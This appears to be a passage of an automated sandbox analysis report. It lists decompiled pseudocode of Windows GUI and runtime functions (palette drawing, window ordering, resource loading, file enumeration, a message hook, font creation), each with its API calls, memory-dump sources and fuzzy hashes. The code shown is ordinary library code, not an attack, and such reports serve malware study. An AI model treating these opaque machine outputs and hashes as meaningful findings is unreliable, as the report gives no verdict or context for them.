                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$FocusVisible$EmptyRect
                                                                                • String ID:
                                                                                • API String ID: 698668684-0
                                                                                • Opcode ID: 36b04a0efda56d6c7fd9ea4d84da65bd67b35b67db63215a326bf2bc792afe28
                                                                                • Instruction ID: aa951be320cb66b1e7991dbc00dcf3a6d2376953a5889a30f220f311acb53e10
                                                                                • Opcode Fuzzy Hash: 36b04a0efda56d6c7fd9ea4d84da65bd67b35b67db63215a326bf2bc792afe28
                                                                                • Instruction Fuzzy Hash: B711A7713001015BC611A67A8841B7BA38D9F4534AF08462AFA54DB343DB2DDC19976E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E00421FDC(int __eax, intOrPtr __ecx, void* __edx) {
                                                                                				struct tagRECT _v32;
                                                                                				int _t11;
                                                                                				int _t29;
                                                                                				void* _t33;
                                                                                				void* _t35;
                                                                                				struct HPALETTE__* _t36;
                                                                                				void* _t38;
                                                                                				struct HPALETTE__* _t39;
                                                                                
                                                                                				_t11 = __eax;
                                                                                				_v32.bottom = __ecx;
                                                                                				_t33 = __edx;
                                                                                				_t29 = __eax;
                                                                                				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
                                                                                					_t36 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                					_t39 = 0;
                                                                                					if(_t36 != 0) {
                                                                                						_t39 = SelectPalette(E0041FDC4(__edx), _t36, 0xffffffff);
                                                                                						RealizePalette(E0041FDC4(_t33));
                                                                                					}
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					_t35 = _t33;
                                                                                					_t38 = _t36;
                                                                                					_v32.right = _v32.right - 1;
                                                                                					_v32.bottom = _v32.bottom - 1;
                                                                                					_t11 = PlayEnhMetaFile(E0041FDC4(_t35),  *( *((intOrPtr*)(_t29 + 0x28)) + 8),  &_v32);
                                                                                					if(_t38 != 0) {
                                                                                						return SelectPalette(E0041FDC4(_t35), _t39, 0xffffffff);
                                                                                					}
                                                                                				}
                                                                                				return _t11;
                                                                                			}












                                                                                APIs
                                                                                • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0042200A
                                                                                • RealizePalette.GDI32(00000000), ref: 00422019
                                                                                • PlayEnhMetaFile.GDI32(00000000,?,?), ref: 0042204B
                                                                                • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0042205F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Palette$Select$FileMetaPlayRealize
                                                                                • String ID:
                                                                                • API String ID: 1995988871-0
                                                                                • Opcode ID: f15c074b92c496038122854ebc95fcd552bcea9610ee8adc800de6ad237f33db
                                                                                • Instruction ID: f4c557c1bb24d42774a62b44b8927d735ce660dfbc53d9c91e84fbf4e2c165a0
                                                                                • Opcode Fuzzy Hash: f15c074b92c496038122854ebc95fcd552bcea9610ee8adc800de6ad237f33db
                                                                                • Instruction Fuzzy Hash: 7101A5716042206BC610BA69DC449ABB3ED9F85338F05063BF919EB382D679DC45C6E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004545F8(void* __eax, void* __ecx, char __edx) {
                                                                                				char _v12;
                                                                                				struct HWND__* _v20;
                                                                                				int _t17;
                                                                                				void* _t27;
                                                                                				struct HWND__* _t33;
                                                                                				void* _t35;
                                                                                				void* _t36;
                                                                                				long _t37;
                                                                                
                                                                                				_t37 = _t36 + 0xfffffff8;
                                                                                				_t27 = __eax;
                                                                                				_t17 =  *0x487bfc; // 0x22e1310
                                                                                				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                                                                					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                                                                						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                                                                						_v12 = __edx;
                                                                                						EnumWindows(E00454588, _t37);
                                                                                						_t5 = _t27 + 0x90; // 0x0
                                                                                						_t17 =  *_t5;
                                                                                						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                                                                							_t33 = GetWindow(_v20, 3);
                                                                                							_v20 = _t33;
                                                                                							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                                                                								_v20 = 0xfffffffe;
                                                                                							}
                                                                                							_t10 = _t27 + 0x90; // 0x0
                                                                                							_t17 =  *_t10;
                                                                                							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                                                                							if(_t35 >= 0) {
                                                                                								do {
                                                                                									_t13 = _t27 + 0x90; // 0x0
                                                                                									_t17 = SetWindowPos(E00413FA4( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                                                                                									_t35 = _t35 - 1;
                                                                                								} while (_t35 != 0xffffffff);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                                                                				}
                                                                                				return _t17;
                                                                                			}












                                                                                APIs
                                                                                • EnumWindows.USER32(00454588), ref: 0045462D
                                                                                • GetWindow.USER32(00000003,00000003), ref: 00454645
                                                                                • GetWindowLongA.USER32 ref: 00454652
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00454691
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$EnumLongWindows
                                                                                • String ID:
                                                                                • API String ID: 4191631535-0
                                                                                • Opcode ID: 54b30549b5890034c280d358ad55b6b187d1585eb2e61102c1a7ec289f303aab
                                                                                • Instruction ID: 5cb2c35cb50d504b52006ad56c3c00fd2761b840e39f3ce058a847bbcc87ac37
                                                                                • Opcode Fuzzy Hash: 54b30549b5890034c280d358ad55b6b187d1585eb2e61102c1a7ec289f303aab
                                                                                • Instruction Fuzzy Hash: C1119E70604200AFDB10AA68CC85F9673A8AB85729F15027AFD58AF2D3C3789C85CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E004168F4(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                                                                				CHAR* _v8;
                                                                                				void* __ebx;
                                                                                				void* __ecx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t18;
                                                                                				void* _t23;
                                                                                				CHAR* _t24;
                                                                                				void* _t25;
                                                                                				struct HRSRC__* _t29;
                                                                                				void* _t30;
                                                                                				struct HINSTANCE__* _t31;
                                                                                				void* _t32;
                                                                                
                                                                                				_v8 = _t24;
                                                                                				_t31 = __edx;
                                                                                				_t23 = __eax;
                                                                                				_t29 = FindResourceA(__edx, _v8, _a4);
                                                                                				 *(_t23 + 0x10) = _t29;
                                                                                				_t33 = _t29;
                                                                                				if(_t29 == 0) {
                                                                                					E00416884(_t23, _t24, _t29, _t31, _t33, _t32);
                                                                                					_pop(_t24);
                                                                                				}
                                                                                				_t5 = _t23 + 0x10; // 0x416694
                                                                                				_t30 = LoadResource(_t31,  *_t5);
                                                                                				 *(_t23 + 0x14) = _t30;
                                                                                				_t34 = _t30;
                                                                                				if(_t30 == 0) {
                                                                                					E00416884(_t23, _t24, _t30, _t31, _t34, _t32);
                                                                                				}
                                                                                				_t7 = _t23 + 0x10; // 0x416694
                                                                                				_push(SizeofResource(_t31,  *_t7));
                                                                                				_t8 = _t23 + 0x14; // 0x4161c0
                                                                                				_t18 = LockResource( *_t8);
                                                                                				_pop(_t25);
                                                                                				return E00416654(_t23, _t25, _t18);
                                                                                			}


















                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 0041690B
                                                                                • LoadResource.KERNEL32(?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 00416925
                                                                                • SizeofResource.KERNEL32(?,00416694,?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 0041693F
                                                                                • LockResource.KERNEL32(004161C0,00000000,?,00416694,?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 00416949
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: e58589db6cc9c2ed489951130424e2c568b54bd93535f2053440df7c87e29db1
                                                                                • Instruction ID: 6a59b26ac78e4b5b86669d74dbecf5df281273e363dea241552c74f923b8e910
                                                                                • Opcode Fuzzy Hash: e58589db6cc9c2ed489951130424e2c568b54bd93535f2053440df7c87e29db1
                                                                                • Instruction Fuzzy Hash: 63F06DB36022046F9708EF6DA881D9B77DCEE993A4312016FF90CD7206DA38DD5183B8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040889C(WORD* __eax) {
                                                                                				struct _FILETIME _v12;
                                                                                				long _t20;
                                                                                				WORD* _t30;
                                                                                				void* _t35;
                                                                                				struct _FILETIME* _t36;
                                                                                
                                                                                				_t36 = _t35 + 0xfffffff8;
                                                                                				_t30 = __eax;
                                                                                				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
                                                                                					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
                                                                                						continue;
                                                                                					} else {
                                                                                						_t20 = GetLastError();
                                                                                					}
                                                                                					L5:
                                                                                					return _t20;
                                                                                				}
                                                                                				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
                                                                                				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
                                                                                				_t30[2] = _t30[0x1c];
                                                                                				_t30[4] = _t30[0xc].dwFileAttributes;
                                                                                				E00404588( &(_t30[6]), 0x104,  &(_t30[0x22]));
                                                                                				_t20 = 0;
                                                                                				goto L5;
                                                                                			}









                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 004088AC
                                                                                • GetLastError.KERNEL32(?,?), ref: 004088B5
                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 004088C9
                                                                                • FileTimeToDosDateTime.KERNEL32 ref: 004088D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                • String ID:
                                                                                • API String ID: 2103556486-0
                                                                                • Opcode ID: faf4f9093bdd09ba35a4a8d2195ad12253dd24e254ffb0e310f1718714673121
                                                                                • Instruction ID: dd138b2cbfea1a41325b38cdf14aeadd6a2b6169d3a22f7e4d744e8d557f4554
                                                                                • Opcode Fuzzy Hash: faf4f9093bdd09ba35a4a8d2195ad12253dd24e254ffb0e310f1718714673121
                                                                                • Instruction Fuzzy Hash: 92F062B35002009FDB04FFA5C9C288733ACEB4431475084BBED05EB286EA38D51487B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00453F14(void* __ecx) {
                                                                                				void* _t2;
                                                                                				DWORD* _t7;
                                                                                
                                                                                				_t2 =  *0x487bfc; // 0x22e1310
                                                                                				if( *((char*)(_t2 + 0xa5)) == 0) {
                                                                                					if( *0x487c14 == 0) {
                                                                                						_t2 = SetWindowsHookExA(3, E00453ED0, 0, GetCurrentThreadId());
                                                                                						 *0x487c14 = _t2;
                                                                                					}
                                                                                					if( *0x487c10 == 0) {
                                                                                						_t2 = CreateEventA(0, 0, 0, 0);
                                                                                						 *0x487c10 = _t2;
                                                                                					}
                                                                                					if( *0x487c18 == 0) {
                                                                                						_t2 = CreateThread(0, 0x3e8, E00453E74, 0, 0, _t7);
                                                                                						 *0x487c18 = _t2;
                                                                                					}
                                                                                				}
                                                                                				return _t2;
                                                                                			}






                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453F2C
                                                                                • SetWindowsHookExA.USER32 ref: 00453F3C
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453F57
                                                                                • CreateThread.KERNEL32(00000000,000003E8,00453E74,00000000,00000000), ref: 00453F7B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateThread$CurrentEventHookWindows
                                                                                • String ID:
                                                                                • API String ID: 1195359707-0
                                                                                • Opcode ID: 0444d7c6d4168982272ff5612d8d20d92426553b9994da3837f237603c9db872
                                                                                • Instruction ID: e28856fd365dcb9ea9107fa12257fb98ca3ea3d1382ea9896caf25c5995a26e3
                                                                                • Opcode Fuzzy Hash: 0444d7c6d4168982272ff5612d8d20d92426553b9994da3837f237603c9db872
                                                                                • Instruction Fuzzy Hash: F6F03071B8D300AEF7106B659D57F1A25A4A310B97F201C7EF6046A1D2C7B85AC487AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 49%
                                                                                			E00423690(void* __eflags) {
                                                                                				int _t14;
                                                                                				intOrPtr _t20;
                                                                                				void* _t21;
                                                                                
                                                                                				DeleteObject( *(_t21 - 0x10));
                                                                                				E00403DA8();
                                                                                				E00403DFC();
                                                                                				_pop(_t20);
                                                                                				 *[fs:eax] = _t20;
                                                                                				_push(0x4236e1);
                                                                                				DeleteDC( *(_t21 - 0x1c));
                                                                                				_t14 = ReleaseDC(0,  *(_t21 - 0x18));
                                                                                				if( *(_t21 - 0x10) != 0) {
                                                                                					return GetObjectA( *(_t21 - 0x10), 0x54,  *(_t21 + 0xc));
                                                                                				}
                                                                                				return _t14;
                                                                                			}







                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: DeleteObject$Release
                                                                                • String ID:
                                                                                • API String ID: 2600533906-0
                                                                                • Opcode ID: ac684a19cf7d03bdfc4d5038e7ab89f884e0849e1027b05f98d6bf5ae10dfc53
                                                                                • Instruction ID: 3429551c4f657d278ba83dca6c20dc1383fca88764dbb818c78fe85dd7b7e0e0
                                                                                • Opcode Fuzzy Hash: ac684a19cf7d03bdfc4d5038e7ab89f884e0849e1027b05f98d6bf5ae10dfc53
                                                                                • Instruction Fuzzy Hash: 68E03071B04215AAEB14FBE9D842B7E77BCEF44305F50482AB510E61C1C63CA9108B28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00407220(void* __eax, int __ecx, long __edx) {
                                                                                				void* _t2;
                                                                                				void* _t4;
                                                                                
                                                                                				_t2 = GlobalHandle(__eax);
                                                                                				GlobalUnWire(_t2);
                                                                                				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                                                                				GlobalFix(_t4);
                                                                                				return _t4;
                                                                                			}






                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Global$AllocHandleWire
                                                                                • String ID:
                                                                                • API String ID: 2210401237-0
                                                                                • Opcode ID: b242d88203f85b8996b776b6ff7dd028c4c5f6cd2c22e953581b3ac5f44f8ee0
                                                                                • Instruction ID: 1a6e8ccd0a1480b6cc6632480fba39d70e8d35f598ec30b1080dd49c18280503
                                                                                • Opcode Fuzzy Hash: b242d88203f85b8996b776b6ff7dd028c4c5f6cd2c22e953581b3ac5f44f8ee0
                                                                                • Instruction Fuzzy Hash: 0EB009D489030439E80433B64E4FE3B002C989070978249BE3442F2882D87CA860803D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E0041EB60(void* __eax, void* __ebx, void* __ecx) {
                                                                                				signed int _v8;
                                                                                				struct tagLOGFONTA _v68;
                                                                                				char _v72;
                                                                                				char _v76;
                                                                                				char _v80;
                                                                                				intOrPtr _t76;
                                                                                				intOrPtr _t81;
                                                                                				void* _t107;
                                                                                				void* _t116;
                                                                                				intOrPtr _t126;
                                                                                				void* _t137;
                                                                                				void* _t138;
                                                                                				intOrPtr _t139;
                                                                                
                                                                                				_t137 = _t138;
                                                                                				_t139 = _t138 + 0xffffffb4;
                                                                                				_v80 = 0;
                                                                                				_v76 = 0;
                                                                                				_v72 = 0;
                                                                                				_t116 = __eax;
                                                                                				_push(_t137);
                                                                                				_push(0x41ece9);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t139;
                                                                                				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                                                                				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                                					 *[fs:eax] = 0;
                                                                                					_push(E0041ECF0);
                                                                                					return E00404344( &_v80, 3);
                                                                                				} else {
                                                                                					_t76 =  *0x487a74; // 0x22e0ad8
                                                                                					E0041DEE4(_t76);
                                                                                					_push(_t137);
                                                                                					_push(0x41ecc1);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t139;
                                                                                					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                                						_v68.lfHeight =  *(_v8 + 0x14);
                                                                                						_v68.lfWidth = 0;
                                                                                						_v68.lfEscapement = 0;
                                                                                						_v68.lfOrientation = 0;
                                                                                						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                                                                							_v68.lfWeight = 0x190;
                                                                                						} else {
                                                                                							_v68.lfWeight = 0x2bc;
                                                                                						}
                                                                                						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                                                                						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                                                                						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                                                                						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                                                                						E0040457C( &_v72, _v8 + 0x1b);
                                                                                						if(E00408594(_v72, "Default") != 0) {
                                                                                							E0040457C( &_v80, _v8 + 0x1b);
                                                                                							E00408BD8( &(_v68.lfFaceName), _v80);
                                                                                						} else {
                                                                                							E0040457C( &_v76, "\rMS Sans Serif");
                                                                                							E00408BD8( &(_v68.lfFaceName), _v76);
                                                                                						}
                                                                                						_v68.lfQuality = 0;
                                                                                						_v68.lfOutPrecision = 0;
                                                                                						_v68.lfClipPrecision = 0;
                                                                                						_t107 = E0041EE44(_t116) - 1;
                                                                                						if(_t107 == 0) {
                                                                                							_v68.lfPitchAndFamily = 2;
                                                                                						} else {
                                                                                							if(_t107 == 1) {
                                                                                								_v68.lfPitchAndFamily = 1;
                                                                                							} else {
                                                                                								_v68.lfPitchAndFamily = 0;
                                                                                							}
                                                                                						}
                                                                                						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                                                                					}
                                                                                					_pop(_t126);
                                                                                					 *[fs:eax] = _t126;
                                                                                					_push(0x41ecc8);
                                                                                					_t81 =  *0x487a74; // 0x22e0ad8
                                                                                					return E0041DEF0(_t81);
                                                                                				}
                                                                                			}

















                                                                                APIs
                                                                                  • Part of subcall function 0041DEE4: RtlEnterCriticalSection.KERNEL32(?,0041DF21), ref: 0041DEE8
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0041EC9E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateCriticalEnterFontIndirectSection
                                                                                • String ID: MS Sans Serif$Default
                                                                                • API String ID: 2931345757-2137701257
                                                                                • Opcode ID: 003712182c8eaff7deaab1224c24189ed19d4a75f6a5e48ecdcb400a55ac035d
                                                                                • Instruction ID: e60251e722a7b7db74474c537270072edb21ad5dc5872d212219de67613c1dc8
                                                                                • Opcode Fuzzy Hash: 003712182c8eaff7deaab1224c24189ed19d4a75f6a5e48ecdcb400a55ac035d
                                                                                • Instruction Fuzzy Hash: D1516474A04248DFDB01CFA9C981BCDBBF5EF48304F6544AAE800A7352E3389E45DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E0040A4C4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                				char _v8;
                                                                                				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                                				char _v297;
                                                                                				char _v304;
                                                                                				intOrPtr _v308;
                                                                                				char _v312;
                                                                                				char _v316;
                                                                                				char _v320;
                                                                                				intOrPtr _v324;
                                                                                				char _v328;
                                                                                				void* _v332;
                                                                                				char _v336;
                                                                                				char _v340;
                                                                                				char _v344;
                                                                                				char _v348;
                                                                                				intOrPtr _v352;
                                                                                				char _v356;
                                                                                				char _v360;
                                                                                				char _v364;
                                                                                				void* _v368;
                                                                                				char _v372;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t82;
                                                                                				intOrPtr _t86;
                                                                                				intOrPtr _t89;
                                                                                				intOrPtr _t101;
                                                                                				void* _t108;
                                                                                				intOrPtr _t110;
                                                                                				void* _t113;
                                                                                
                                                                                				_t108 = __edi;
                                                                                				_v372 = 0;
                                                                                				_v336 = 0;
                                                                                				_v344 = 0;
                                                                                				_v340 = 0;
                                                                                				_v8 = 0;
                                                                                				_push(_t113);
                                                                                				_push(0x40a67f);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t113 + 0xfffffe90;
                                                                                				_t89 =  *((intOrPtr*)(_a4 - 4));
                                                                                				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                                                                					_t52 =  *0x486c64; // 0x40751c
                                                                                					E00406520(_t52,  &_v8);
                                                                                				} else {
                                                                                					_t86 =  *0x486dd4; // 0x407514
                                                                                					E00406520(_t86,  &_v8);
                                                                                				}
                                                                                				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                                                                                				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                                                                                				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                                                                					_v368 =  *(_t89 + 0xc);
                                                                                					_v364 = 5;
                                                                                					_v360 = _v8;
                                                                                					_v356 = 0xb;
                                                                                					_v352 = _t110;
                                                                                					_v348 = 5;
                                                                                					_t60 =  *0x486d30; // 0x4074bc
                                                                                					E00406520(_t60,  &_v372);
                                                                                					E0040A0EC(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                                                                                				} else {
                                                                                					_v332 =  *(_t89 + 0xc);
                                                                                					_v328 = 5;
                                                                                					E00404588( &_v340, 0x105,  &_v297);
                                                                                					E00408A10(_v340,  &_v336);
                                                                                					_v324 = _v336;
                                                                                					_v320 = 0xb;
                                                                                					_v316 = _v8;
                                                                                					_v312 = 0xb;
                                                                                					_v308 = _t110;
                                                                                					_v304 = 5;
                                                                                					_t82 =  *0x486cdc; // 0x40756c
                                                                                					E00406520(_t82,  &_v344);
                                                                                					E0040A0EC(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                                                                                				}
                                                                                				_pop(_t101);
                                                                                				 *[fs:eax] = _t101;
                                                                                				_push(E0040A686);
                                                                                				E00404320( &_v372);
                                                                                				E00404344( &_v344, 3);
                                                                                				return E00404320( &_v8);
                                                                                			}


































                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A67F), ref: 0040A52F
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A67F), ref: 0040A551
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
